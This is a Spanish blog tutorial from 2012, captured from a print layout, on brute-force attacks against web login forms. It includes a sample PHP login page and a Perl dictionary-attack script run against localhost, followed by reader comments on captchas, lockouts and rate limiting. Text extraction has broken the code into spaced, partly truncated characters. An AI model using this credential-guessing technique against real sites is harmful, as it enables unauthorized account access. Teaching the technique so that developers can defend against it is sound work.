You are on page 1of 20

Ataques de fuerza bruta a formularios web

Pgina 1 de 20

Portada Lo Mejor Productos Respuestas Comunidad Seguridad informtica

Ataques de fuerza bruta a formularios web


27 comentarios

Yago Jesus 6 de junio de 2012 | 16:11

Durante una auditora de seguridad, es frecuente encontrarse con formularios web de acceso que no incorporan un sistema de captchas para evitar los ataques por fuerza bruta. Ejemplos de esta clase de formularios es fcil encontrarlos en todo tipo de organizaciones, grandes y pequeas, y pueden ser un importante vector de riesgo si un atacante, armado con un buen diccionario, intenta averiguar credenciales de acceso. Para hacerlo aun ms divertido existen herramientas que permiten crear un diccionario en base al contenido de una web. Extraen todas las palabras, y con ello generan un diccionario de trminos relacionados con la organizacin. En muchos casos el ratio de xito con esos diccionarios es asombrosamente alto. Un ejemplo de este tipo de herramientas es WLAuthor o CeWL Hoy voy a explicar cmo implementar un ataque a esos formularios de una forma artesanal, paso a paso y construyendo nuestro propio cdigo para explotar la vulnerabilidad.

Ejemplo prctico de un ataque a un formulario

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

Ataques de fuerza bruta a formularios web

Pgina 2 de 20

<f <f <l <l <i <l <i <i </ </

or m i d=' l ogi n' ac t i on=' l ogi n. php' m hod=' pos t ' ac c ept - c har s et =' UTFet i el ds et > egend>Genbet a Dev Ac ces o r es t r i ngi do</ l egend> abel f or =' us er nam e' >Us uar i o : </ l abel > nput t ype=' t ex t ' nam e=' user nam e' i d=' us er nam e' m l engt h=" 50" / > ax abel f or =' pas s wor d' >Cont r as e a : </ l abel > nput t ype=' pas s wor d' nam e=' pass wor d' i d=' pass wor d' m axl engt h=" 50" / > nput t ype=' s ubm t ' nam i e=' Subm t ' / > i f i el ds et > f or m >

Thi s Gi s t br ought t o you by Gi t Hub.

gi st f i l e1. pht m l

vi ew r aw

Tomemos como ejemplo este formulario web que lleva asociado un fichero .php que procesa las peticiones de login. El ejemplo es MUY sencillo, el script en php tan solo comprueba contra un usuario / contrasea predefinido en el cdigo. Claramente, en un escenario real, realizara esta comprobacin contra un backend SQL. No obstante, la tcnica que voy a explicar es plenamente vlida tanto en este escenario como en otros ms complejos. <?PHP s es si on_st ar t ( ) ; i f ( $_SERVER[ " REQUEST_M ETHOD" ] == " POST" ) { $us uar i o = " pedr o" ; $pas s= " 123456" ; i f ( ! ( $_POST[ ' us er nam ] == $us uar i o && $_POST[ ' pas swor d' ] == $pass e' { Echo " <ht m >" ; l Echo " <t i t l e>M UY m </ t i t l e>" ; al Echo " <b>Ac c es o denegado</ b>" ; ses s i on_des t r oy ( ) ; r et ur n f al se; } el se { Echo " <ht m >" ; l Echo " <t i t l e>M UY bi en</ t i t l e>" ; Echo " <b>Ac c es o c onc edi do</ b>" ; ses s i on_des t r oy ( ) ; r et ur n t r ue; } } ?>
Thi s Gi s t br ought t o you by Gi t Hub. l ogi n. php vi ew r aw

Si colgamos estos ficheros en un servidor y accedemos a index.html nos encontramos con lo siguiente:

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

Ataques de fuerza bruta a formularios web

Pgina 3 de 20

El formulario nos pide un usuario y una contrasea. Si probamos uno cualquiera, nos encontramos con lo siguiente:

Un mensaje de error diciendo Acceso denegado El siguiente paso es averiguar que ha pasado y como hemos llegado a ese mensaje de error. Hay que analizar exactamente como se construye esa peticin. Para ello podemos hacer uso de una extensin para Firefox llamada Tamper Data que, entre otras cosas, permite ver las peticiones del navegador en crudo. Si lanzamos Tamper Data y repetimos la peticin podemos ver lo siguiente:

Ah tenemos exactamente los datos de la peticin que genera el formulario web. Es una peticin de tipo POST con los valores :

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

Ataques de fuerza bruta a formularios web

Pgina 4 de 20

username password Submit De lo que se infiere que realmente los dos parmetros que tenemos que adivinar son username y password. Para ello vamos a crearnos nuestro propio script para lanzar un ataque de fuerza bruta contra ese formulario. Usaremos como lenguaje de programacin Perl, dado que es un lenguaje flexible y muy rico en mdulos que simplifican las tareas a la mnima expresin. Adems, todo lo que vamos a desarrollar va a funcionar tanto en Windows como en Linux El ltimo dato necesario para poder construir nuestro script es hacer fingerprinting de los mensajes de la aplicacin, lo que buscamos es un patrn fijo que indique error para poder buscar justamente lo contrario: la ausencia de ese mensaje, que ser seal de que hemos acertado en nuestras pruebas. Si analizamos la respuesta con Tamper Data (botn derecho > ver fuente):

Vemos la respuesta HTTP del servidor en caso de un intento fallido. Con esa informacin es ms que suficiente para programar el script El script funciona de la siguiente manera: 1. Carga los mdulos necesarios para lanzar peticiones http 2. Abre un fichero llamado diccionario.txt que emplear para el ataque de fuerza bruta (podis obtener diccionarios para pruebas desde PacketStorm http://packetstormsecurity.org/Crackers/wordlists/ ) 3. Con una funcin de tipo foreach (funcin de bucle ultra-optimizada) recorre el diccionario y va construyendo pares usuario / contrasea 4. Lanza la peticin http de tipo POST contra el servidor por cada par usuario / contrasea 5. Parsea la respuesta en busca del patrn MUY mal 6. Si no encuentra ese texto en la respuesta, asume que ha encontrado el usuario / contrasea y lo muestra

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

Ataques de fuerza bruta a formularios web

Pgina 5 de 20

# Ej em o de ' br ut e- f or c er ' pl # Yago J es us @ esus YJ use LW : Us er Agent ; P: use s t r i ct ;

par a f or m ar i os web ul

#Si no hay al m enos un ar gum ent o, m ost r am os l a ay uda i f ( $#ARGV < 0) { pr i nt " Us age: \ n" ; pr i nt " per l br ut t er . pl URL\ n" ; ex i t ( ) ; } m $ur l t ohac k = @ y ARGV[ 0] ; #Abr i m os el cont eni do del di c c i onar i o

open ( FI LE, " di c c i onar i o. t x t " ) | | di e " No puedo abr i r el f i c her o di c c i onar i o: $! "

#Pasam os el cont eni do del f i c her o a m or i a, OJ O di c c i onar i os m em uy gr andes y poca m @ c c i onar i o = <FI LE> ; y di #I nst anc i am os un LW par a nav egar P m $ua = new LW : Us er Agent ; y P: #Fi j am os l a URL obj et i vo y s el ecc i onam os el m odo POST et m $r eq = new HTTP: : Reques t ' POST' , $ur l t ohac k ; y f or each( @ c ci onar i o) { di m $us uar i o = $_ ; y chom $us uar i o) ; p( f or each( @ c c i onar i o) { di m $pass wor d = $_ ; y c hom $pas swor d) ; p( #Cons t r ui m os l as c abec er as $r eq- >cont ent _t ype( ' appl i cat i on/ x - www- f or m ur l encoded' #Fi j am os l ogi n / pas s

$r eq- >cont ent ( " &us er nam e=$us uar i o&pas s wor d=$pas s wor d&Subm t =Envi i #hac em os l a pet i c i on m $r es = $ua- >r equest ( $r eq) ; y

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

Ataques de fuerza bruta a formularios web

Pgina 6 de 20

#obt enem os l a r es puest a del s er v i dor y l a al m enam ac os en una v ar m $r espuest a = $r es - >as _st r i ng; y #pr i nt " $r es puest a\ n" ;

#Bus c am os en l a r es pues t a l a f r as e " M UY m " que y a s abem al os i ndi i f ( $r es pues t a ! ~ / M UY m / ) { al

#Si no es t as um m i os que hem os enc ont r ado el us uar i o y c } pr i nt " Enhor abuena ! us uar i o- - > $us uar i o pas s wor d

Thi s Gi s t br ought t o you by Gi t Hub.

br ut t er . pl

vi ew r aw

Podemos verlo en accin:


$ per l br ut t er . pl ht t p: / / 127. 0. 0. 1/ t es t / l ogi n. php

Enhorabuena ! usuario> pedro password > 123456 Ms informacin | Tamper Data Yago Jesses profesional de la Seguridad informtica desde el 2001 ha colaborado profesionalmente con los equipos de seguridad en grandes empresas del sector telecomunicaciones, entidades bancarias, organismos del sector defensa, y participado activamente en el despliegue de la PKI del DNI Electrnico. Editor del blog Security By Default, ha desarrollado multitud de herramientas entre las que destacan Unhide herramienta para realizar anlisis forenses en sistemas Unix/Windows que forma parte de las principales distribuciones Linux (Debian, Ubuntu, RedHat) O Patriot NG herramienta anti-Malware para entornos Microsoft Puedes seguirlo en Twitter: @YJesus

me gusta2
17 50 Me gusta 19

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

Ataques de fuerza bruta a formularios web

Pgina 7 de 20

Estn bien pagados los desarrolladores en Espaa? La pregunta de la semana Genbetadev el cdigo es la ley

Hola!

Entra

Mvil RSS Correo Facebook Twitter Widget


Busca en Genbetadev con Google

Lee tambin: Applesfera Tecnologa Pyme Xataka Home Ver ms

Anunciate aqu Anunciate aqu Anunciate aqu


I BM R AT I ON AL, EL I M PU LSO D EFI N I TI V O H ACI A LA I N N O V ACI N

En un entorno de mercado cada vez ms exigente y competitivo, las empresas buscan marcar la diferencia mediante la innovacin en productos y servicios. En este contexto, el software integrado se ha convertido en el nuevo cerebro que permite a las empresas acelerar la innovacin y desarrollar productos ms inteligentes, permitiendo reducir costes y riesgos, y adaptndose rpidamente a las distintas necesidades de mercados y clientes. El software integrado permite a las organizaciones responder a los cambios con mayor precisin, seguridad y puntualidad, acortando

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

Ataques de fuerza bruta a formularios web

Pgina 8 de 20

notablemente los plazos de entrega y haciendo frente al constante incremento de las normas reguladoras. Comprueba a travs del caso de xito de Invensys Rail Dimetronic, compaa lder en seguridad y sealizacin ferroviaria, cmo Rational DOORs, herramienta lder en gestin de requisitos, ha ayudado a desarrollar sistemas de transporte ms inteligentes y

Quieres saber ms?


Artculos
Artculos relacionados que probablemente tambin te interesen

Por qu las APIs no deberan usar el modelo de autenticacin login/password?hace un mes Ver ms

Respuestas
Preguntas sobre este tema que ha contestado la comunidad 0 Como puedo dar seguridad a mis script en php sin utilizar un complejo framework?hace un ao Ver ms + Deja tu comentario

Comentarios
Ms valorados Recientes Cronolgico 3 ! Eagle |

www.idolium.com/es

Como digo ms arriba, es sencillo y funciona. Lo que podra pasar es que saturases a peticiones al servidor mientras no encuentras la clave, no? Quiero decir que si algn administrador tiene alertas por carga de CPU o de peticiones, se dara cuenta muy rpido de este ataque. Responder 6 jun 2012 16:58 Karma 10 (0 votos) | normal Respondiendo a #3: 7 ! yjesus | www.securitybydefault.com

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

Ataques de fuerza bruta a formularios web

Pgina 9 de 20

Depende del sitio, si es un ADSL con una web que normalmente recibe 10 visitas x da, claro que se va a notar. En una web con un trfico importante, probablemente pasen das Responder 6 jun 2012 17:22 Karma 5 (0 votos) | normal Respondiendo a #7: 11 ! Eagle |

www.idolium.com/es

Eso respecto a que se note el nde visitas, pero qu hay de la repeticin instantnea de peticiones? Imagina que tu diccionario sea de 1 milln de trminos son 1 milln de consultas consecutivas al servidor. Lo podra colapsar, no? Responder 6 jun 2012 17:59 Karma 10 (0 votos) | normal Respondiendo a #11: 12 ! yjesus | www.securitybydefault.com Tienes una importante limitacin: el ancho de banda, y adems el script no usa hilos, que aun 'castigara' mucho mas al servidor. No obstante, ya te adelanto que un apache en un servidor decente, es francamente difcil tirarlo as Responder 6 jun 2012 18:02 Karma 5 (0 votos) | normal Respondiendo a #11: 26 ! LoBo |

www.oyagum.com

Eso es una programacin as rpida para demostrarnos lo fcil que sera tumbar un sitio web, pero si te pones a hilar ms fino fijo que puedes programarlo para que haga peticiones cada media hora o una hora, ralentizando mucho ms el proceso de encontrar un usuario y contrasea pero que al final acabara saliendo. Es ms que si no se preocupan de la seguridad en el formulario, no creo ni que miren las peticiones que reciben, con lo cual solo se enteraran si ocurriese algo grave en el servidor, sino ni se enteraran :) Responder 7 jun 2012 09:57 Karma 8 (0 votos) | normal 18 ! Eagle |

www.idolium.com/es

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

Ataques de fuerza bruta a formularios web

Pgina 10 de 20

No me haba fijado en tu ficha: eres nuevo editor y de un tema que me encanta, la seguridad. Seguro que te has pasado por Kriptopolis alguna vez. Siempre me ha encantado el tema de la seguridad en nuestro trabajo, pero nunca he podido dedicarme a esto profesionalmente porque me dedico a otros menesteres. Quiz algn da me pase a este bando y es bueno saber con quin se puede contactar para aprender ms. Yo creo que una profesin de futuro es el anlisis forense: cunta gente conocis que se dedique a eso? Yo, personalmente, solo a una. Y cada vez la informtica domina ms todos los mbitos. Responder 6 jun 2012 19:16 Karma 10 (0 votos) | normal Respondiendo a #18: 19 ! yjesus | www.securitybydefault.com En realidad, son colaboraciones espordicas, me extraa que conozcas Kriptopolis y no Security By Default ! que es el blog donde habitualmente escribo :P Respecto a temas forenses, hay mucho trabajo, de hecho yo he hecho profesionalmente muchos. He publicado varias herramientas forenses, como Unhide (que est packetizada en cualquier distribucin de Linux) o RadioGraphy. Si buscas blogs sobre forensics, el ms conocido es 'conexin inversa' de Pedro Sanchez Responder 6 jun 2012 19:21 Karma 5 (0 votos) | normal Respondiendo a #19: 20 ! Eagle |

www.idolium.com/es

Quin dice que no lo conoca? No lo he nombrado porque es tu firma y lo pone en tu "resumen" al final del artculo. Si me quedo sin trabajo, que tal como est el panorama hoy podra ser en cualquier momento, mi intencin es especializarme en temas forenses. Ya te consultara al respecto para que me dieses algunos consejos, si no te importa. Pero como digo, es si me quedo sin trabajo, de momento me va bien con la "gestin". Responder 6 jun 2012 19:40 Karma 10 (0 votos) | normal 13 ! tupadre | Pregunta monguer que lanzo: Con captchas esto ya deja de servir, no? Captcha es una medida segura robusta para este tipo de cosas? Que otras tecnicas son recomendadas implementar para reforzar la seguridad?

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

Ataques de fuerza bruta a formularios web

Pgina 11 de 20

Muy buen articulo. Me siento como un "hacker" xDD Es coa, claro. -- editado por ltima vez a las 18:11 Responder 6 jun 2012 18:10 Karma 8 (0 votos) | normal Respondiendo a #13: 16 ! yjesus | www.securitybydefault.com Esa medida es tan fiable como lo sea la implementacin del captcha :) Responder 6 jun 2012 19:06 Karma 5 (0 votos) | normal Respondiendo a #13: 25 ! John Appleseed | La robustez del captcha sera equivalente al tiempo que toma romperlos, aunque hay unos muy efectivos, creo que deberan acompaarse con otras medidas de seguridad. Por ejemplo: Bloquear por IP y por Cookie un ordenador que hace muchas peticiones. Bloquear temporamente el login aquellas cuentas que reciben demsiados intentos en poco tiempo. Por ejemplo si slo permites 4 o 5 por minuto, y luego desactivas la cuenta 5 minutos, los ataques se vuelven ineficientes. Edit: Quizs se puede mandar un correo a la "victima" con alguna clave que le permita activar su cuenta, por cuestiones de accesibilidad. Tener diversos mensajes de error que salgan aleatoriamente para eviar que el programa encuentre patrones que le permitan saber cuando se equivoca. Incluso he visto casos donde una pgina hace un contra-ataque, digamos de DDoS u cualquier cosa que sature el equipo del atacante, pero creo que esta medida debe ser evitada ya que un error podra ocasionar que se ataque a usuarios inocentes. De hecho yo la conoc porqu me la aplicaron en un foro al trata de editar un mensaje, y luego el admin me pidi disculpas diciendo que era un error. xD -- editado por ltima vez a las 06:22 Responder 7 jun 2012 06:17 Karma 8 (0 votos) | normal 1 ! orenxrei | Wooow ya tengo como echarle a perder sus proyectos a mis compaeros, XD muy interesante, aun soy estudiante y aplico mis formularios de esa forma, la duda que tengo es que se puso el usuario y

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

Ataques de fuerza bruta a formularios web

Pgina 12 de 20

el password en el codigo, que pasa si lo estoy llamando de una base de datos sea sql,mysql etc etc y solo funciona con php??? Responder 6 jun 2012 16:29 Karma 5 (0 votos) | normal Respondiendo a #1: 2 ! Eagle |

www.idolium.com/es

Pasara lo mismo, lo comenta l mismo al principio. Este script tan solo hace una peticin y el cdigo del servidor ya se encarga de dar una respuesta, correcta o incorrecta. El script recoge la respuesta y, si no es incorrecta, acabas de encontrar el cdigo. Es sencillo y funciona, poco ms necesitas. -- editado por ltima vez a las 16:55 Responder 6 jun 2012 16:54 Karma 10 (0 votos) | normal Respondiendo a #1: 8 ! yjesus | www.securitybydefault.com El ejemplo est hecho en PHP, pero funciona con cualquier tecnologa siempre y cuando no usen captchas para evitar ataques de fuerza bruta. Al final es detectar el patrn de login incorrecto para poder implementar el ataque Responder 6 jun 2012 17:22 Karma 5 (0 votos) | normal 4 ! Miguel Lopez Fernandez | vale y apara pass que son sha1 que? Responder 6 jun 2012 17:00 Karma 5 (0 votos) | normal Respondiendo a #4: 5 ! Eagle |

www.idolium.com/es

Eso da igual, aqu solo se busca el mensaje de error: si no hay error, la clave es buena. No importa si est encriptada o no, t solo envas un formulario que es el mismo que escribira el usuario (que no sabe nada de encriptacin).

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

Ataques de fuerza bruta a formularios web

Pgina 13 de 20

Responder 6 jun 2012 17:05 Karma 10 (0 votos) | normal Respondiendo a #5: 9 ! yjesus | www.securitybydefault.com Efectivamente, son capas de la aplicacin diferentes, el como estn almacenadas las contraseas en la base de datos es totalmente independiente para poder realizar el ataque. Por ejemplo, Facebook almacena sus contraseas cifradas y tu, cuando haces login no tienes que enviar nada cifrado, tan solo tus credenciales Responder 6 jun 2012 17:24 Karma 5 (0 votos) | normal 6 ! codigobyte | www.codigobyte.tk A veces hago una variable de session numerica y que se incrementa a medida que falla los intentos cuando llega al limite te redirecciona a otra web pidiendo al usuario que se registre, igual funcionaria el hack que que hicieron con perl? Responder 6 jun 2012 17:13 Karma 5 (0 votos) | normal Respondiendo a #6: 10 ! yjesus | www.securitybydefault.com Depende de como de predecible sea esa variable y como gestiones internamente el uso de ella. Si yo puedo predecir como se genera la variable, puedo automatizar esa parte. Y si tu, simplemente generas la variable para comprobar en que intento est, pero no tienes en cuenta si las llamadas son siempre con el mismo parmetro de esa variable (por ejemplo auths=2 siempre), tampoco sirve como contra-medida Responder 6 jun 2012 17:25 Karma 5 (0 votos) | normal 14 ! mingot | Yo alguna vez que he hecho algn programita de este tipo tambin los he hecho con "curl" de php, o con "HttpWebRequest" de .NET, bastante util... :) Responder 6 jun 2012 18:34 Karma 5 (0 votos) | normal 15

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

Ataques de fuerza bruta a formularios web

Pgina 14 de 20

! fht233 | El captcha es una barrera en muchos casos inaceptable, especialmente para usuarios ya registrados. Es mucho mejor sistema bloquear la cuenta de un usuario determinado al cabo de p.ej. 5 intentos consecutivos fallidos en menos de una hora. El bloqueo puede ser durante un par de horas, o permanente hasta que alguien lo desbloquee segun algun procedimiento manual o usando por ejemplo el email del usario. Tambien es una buena idea en ciertos sistemas informar al usuario despues de hacer login de la ultima fecha y hora en que entro y de si han habido intentos fallidos de hacer login desde entonces. Y tambien es habitual sistemas que estudian patrones de ataque y avisan al administrador. Y sistemas de ataquen que intentan evitar ser detectados por patrones, cambiando de usuario cada vez, dejando espacios de tiempo aleatorios... Responder 6 jun 2012 18:55 Karma 5 (0 votos) | normal Respondiendo a #15: 17 ! yjesus | www.securitybydefault.com Uno de los principios de la seguridad (que muchas veces se obvia) es la DISPONIBILIDAD. Aplicar bloqueos a cuentas puede devengar en que un atacante haga un DoS y los usuarios legtimos no puedan acceder Responder 6 jun 2012 19:07 Karma 5 (0 votos) | normal Respondiendo a #17: 21 ! fht233 | Puedes bloquear temporalmente solo la IP que se ha equivocado varias veces. Lo cierto es que pocas webs importantes piden captcha cada vez que entra un usuario ya registrado y sin embargo tienen medidas contra ataques de formulario. Supongo que habran mas sistemas. Responder 6 jun 2012 19:43 Karma 5 (0 votos) | normal Respondiendo a #15: 22 ! Gerardo |

www.treeweb.es/

Yo lo que suelo hacer es bloqueos de 3 o 5 segundos por usuario tras cada peticin de login fallida o no. De esta forma limitas el nmero de intentos a 20.000 por da Responder

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

Ataques de fuerza bruta a formularios web

Pgina 15 de 20

6 jun 2012 22:18 Karma 10 (0 votos) | normal Respondiendo a #15: 27 ! LoBo |

www.oyagum.com

Puedes hacerlo al igual que Google, que si has intentado entrar varias veces equivocandote de password entonces te pido el captcha sino no ;) Yo soy partidario de los captchas, pero de los que son sencillos, osea de los que son ms accesibles que los que no se pueden leer bien, aqu lo explican por ejemplo : http://www.alzado.org/articulo.php?id_art=561 Y realmente creo que es una tcnica fantastica para comprobar la humanidad de la persona al otro lado del ordenador y mucho ms sencillo que no las letras que no se consiguen entender, y que encima en algunos casos no puedes solicitar otros y tienes que fallar con el que hay. Responder 7 jun 2012 10:02 Karma 8 (0 votos) | normal 23 ! Benjamin Diaz | Hola, muuy interesante pero llega una inquietud: que pasa si el login se realiza con una peticion ajax, ya no se podria encontrar un patrn fijo que indique algun error, osea funcionaria igual mientras usaramos la direecion que utiliza la peticion ajax me respondi solo jeje x.x saludos Responder 7 jun 2012 00:04 Karma 5 (0 votos) | normal 24 ! sopasucks | Muy buen post, pero creo q este tema da para mucho ms. Podras poner por ej: como poner captchas despus de 20 intentos o como usar recaptcha. Responder 7 jun 2012 02:38 Karma 5 (0 votos) | normal

Escribir un comentario
Para hacer un comentario es necesario que te identifiques: ENTRA o conctate con Facebook
Connect

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

Ataques de fuerza bruta a formularios web

Pgina 16 de 20

M ejor comentario
Eso respecto a que se note el nde visitas, pero qu hay de la... Eagle

Destacados

Editores
Txema Rodrguez Jorge Rubira Fernando Siles

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

Ataques de fuerza bruta a formularios web

Pgina 17 de 20

Oscar Campos Juan Quijano Johnbo lvaro Aroca josejuan Envanos pistas Anunciate aqu

Comentarios
ltimos Lo+comentado 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. World IPv6 Launch, el mundo es diferente ahora Estn bien pagados los desarrolladores en Espaa? La pregunta de la semana Ataques de fuerza bruta a formularios web Levenshtein, midiendo las palabras La nueva Nueva versin 12.1.0 de Twisted ya est en la calle BitNami, mquinas virtuales listas para utilizar gmaps.js, manejando la API de Google Maps sin quebraderos de cabeza Crnica de la #BilboStack, evento sobre desarrollo web y buenas prcticas Windows 8, sensaciones sobre Release Preview Descubriendo Libsaas, proyecto de cdigo abierto de Ducksboard

Secciones
Algoritmos Desarrolladores
Desarrollo freelance Formacin Trabajar como desarrollador

Desarrollo de aplicaciones
Bases de datos Desarrollo aplicaciones mviles Desarrollo web Frameworks Gestores de contenido Herramientas Metodologas de programacin Paradigmas de programacin Programacin de videojuegos Programacin en la nube Seguridad informtica

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

Ataques de fuerza bruta a formularios web

Pgina 18 de 20

Sistemas de control de versiones

General
Actualidad Desarrolladores Entrevistas Genbeta Dev Modelos de negocio Software libre y licencias

Lenguajes de programacin Lenguajes y plataformas


C#/.NET C/C++ Java-J2EE JavaScript Objective-C / Cocoa PHP Python Ruby Archivo

Contenidosrecomendados en Genbetadev
Especiales
Desarrollo en equipo Entrevistas de trabajo para desarrolladores Herramientas Imprescindibles para Desarrolladores

Consejospara desarrolladores
Consejos para trabajar como freelance Mejora tu concentracin con Pomodoro

Guas
Diseo de base de datos de poblaciones, pases y provincias Novedades en Firefox 4 para desarrolladores

Secciones de Genbeta Dev


La pregunta de la semana

WSL Weblogs SL
Tecnologa

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

Ataques de fuerza bruta a formularios web

Pgina 19 de 20

Xataka Xataka Mvil Xataka Foto Xataka On Xataka Ciencia Genbeta Applesfera VidaExtra Nacin Red Xataka Android Genbeta Dev Genbeta Social Media Xataka Smart Home

Entretenimiento
Blog de cine Vaya tele! Hipersnica Diario del viajero Papel en blanco Poprosa Zona Fandom Fandemia

Estilos de vida
Trendencias Bebs y ms Directo al paladar Compradiccin Decoesfera Embelezzia Vitnica Ambiente G Trendencias Belleza Trendencias Hombre Peques y ms

M otor y deportes
Motorpasin Motorpasin F1 Motorpasin Moto Notas de ftbol Fuera de lmites Motorpasin Futuro

Economa
El Blog Salmn Pymes y Autnomos Tecnologa Pyme Ahorro diario

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

Ataques de fuerza bruta a formularios web

Pgina 20 de 20

Participamosen
eBayers Circula seguro Actibva Anexo-m Happing Magazine Blog Sage Optimismo Digital 1001 experiencias En Naranja Essie Blog Bloggin Zenith

Publicaciones en Latinoamrica
Tecnologia Xataka Brasil Xataka Mxico Estilos de vida tRendncias Brasil M otor y deportes Motorpasin Brasil volver arriba Acerca de Genbetadev | Condiciones de uso | Aviso legal | Publicidad | Ayuda | Contacto

http://www.genbetadev.com/seguridad-informatica/ataques-de-fuerza-bruta-a-formula... 07/06/2012

You might also like